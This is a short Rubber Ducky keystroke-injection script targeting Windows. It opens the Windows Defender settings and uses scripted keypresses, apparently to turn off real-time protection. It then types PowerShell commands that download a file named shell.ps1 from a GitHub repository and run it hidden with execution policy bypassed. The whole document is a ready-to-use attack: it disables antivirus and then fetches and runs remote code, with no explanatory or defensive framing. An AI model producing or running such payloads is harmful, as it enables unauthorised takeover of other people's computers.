
DELAY 1000
GUI R
DELAY 1000
STRING windowsdefender:
DELAY 1000
ENTER
DELAY 3000
ENTER
TAB
TAB
TAB
TAB
DELAY 1000
ENTER
DELAY 1000
SPACE
DELAY 1000
LEFT
DELAY 1000
ENTER
DELAY 1000
ALT F4
DELAY 1000
GUI R
DELAY 1000
STRING powershell
DELAY 1000
ENTER
DELAY 1000
STRING Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/kUrOSH1R0oo/RubberDuckyPayloads/refs/heads/main/shell.ps1' -OutFile "$env:TEMP\shell.ps1"
DELAY 1000
ENTER
DELAY 1000
STRING Start-Process powershell.exe -ArgumentList "-ExecutionPolicy Bypass -File `"$env:TEMP\shell.ps1`"" -WindowStyle Hidden; exit
DELAY 1000
ENTER
DELAY 1000
